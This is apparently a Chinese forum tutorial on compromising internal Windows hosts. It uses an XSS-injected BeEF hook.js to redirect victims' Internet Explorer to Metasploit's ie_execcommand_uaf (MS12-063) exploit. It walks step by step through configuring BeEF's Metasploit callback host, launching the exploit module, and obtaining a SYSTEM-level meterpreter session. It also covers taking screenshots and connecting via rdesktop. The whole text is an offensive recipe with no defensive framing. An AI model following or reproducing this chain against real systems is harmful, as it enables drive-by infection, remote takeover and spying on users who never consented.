metasploit利用IE漏洞XSS挂马拿内网主机
<p>系统:KALI <br /><br />用到的工具:beEF+msf <br /><br />利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf <br /><br />MS12-063 <br />AutomaticIE 7 on Windows XP SP3IE 8 on Windows XP SP3IE 7 on Windows VistaIE 8 on Windows VistaIE 8 on Windows 7IE 9 on Windows 7 <br />用到的beef+msf <br /><br />先配置下: <br /><br />root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock <br />编辑下config.yaml <br />把metasploit :false改成true <br /><br /><img style="TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: medium Simsun; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px" title="psb1.jpg" src="https://img.jbzj.com/file_images/article/201407/2014071711270158.jpg" alt="" /><br /><br />再进入extensions/metasploit/ <br />同样修改下config.yaml <br />把host跟callback_host 改成自己的IP 这里是220.128 <br /><br /><img style="TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: medium Simsun; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px" title="psb2.jpg" src="https://img.jbzj.com/file_images/article/201407/2014071711270159.jpg" alt="" /><br /><br />再改动下custom path: <br /><br /><img style="TEXT-TRANSFORM: none; TEXT-INDENT: 0px; FONT: medium Simsun; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px" title="psb3.jpg" src="https://img.jbzj.com/file_images/article/201407/2014071711270160.jpg" alt="" /><br /><br />这样beef已经配置好了。那就运行下metasploit <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270161.jpg" alt="" /><br /><br />运行msf后 数据库连接下,不然上线也会没有提示的。这里的pass 就是extensions/metasploit/config.yaml里面的pass <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270162.jpg" alt="" /><br /><br />这样就没有什么问题。我们可以先看一下beef.数据库只要连上了就不会出现msf的api错误的。 <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270163.jpg" alt="" /><br /><br />进入beef <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270164.jpg" alt="" /><br /><br />账号密码beef 配置文件里面有。beef:beef <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270165.jpg" alt="" /><br /><br />那beef已经都OK了。 <br />现在来搞下选择下要显示的页面: <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270166.jpg" alt="" /><br /><br />hook.js 运行beef 显示出来的。 <br />别忘记运行下apache。 <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270167.jpg" alt="" /><br /><br />我们再进入msf <br /><br />use exploit/windows/browser/ie_execcommand_uaf <br />可以自己根据自己的要求来选择。 <br /><br />show options <br />port可以自已改。 <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270168.jpg" alt="" /><br /><br />我用xp+ie7 <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270169.jpg" alt="" /><br /><br />直接访问下我们的页面192.168.220.128/xss/ <br />beef就会显示出来了。 <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270170.jpg" alt="" /><br /><br />点击 commands-hookeddomain-REDIRECT BROWSER 让他重新跳转到我们msf生成的地址上。beef很多功能。 <br />把地址改成192.168.220.128:8080(msf生成的地址) <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270171.jpg" alt="" /><br /><br />我们就会看到msf上面已经显示出来了。 回显了sessions <br />payload可以自己去改。我使用的meterpreter载荷 <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270172.jpg" alt="" /><br /><br />执行sessions -i <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270173.jpg" alt="" /><br /><br />执行sessions -i ID号 <br />可以执行任意命令已经是系统权限 <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270174.jpg" alt="" /><br /><br />执行下screenshost <br /><br />meterpreter > screenshot Screenshot saved to: /root/dlsSQBkF.jpeg <br />就可以看到当前主机的屏幕内容。 <br /><br /><img src="https://img.jbzj.com/file_images/article/201407/2014071711270175.jpg" alt="" /><br /><br />也可以rdesktop 远程连接上去。 <br />参数rdesktop -f ip -u username -p password <br />这也是一种xss挂马拿内网主机。 <br /><br />注:鄙人每天都在写一些metasploit的玩法,如果有大神有什么好的方法希望告诉我,我更新在空间,分享给大家。</p>
頁:
[1]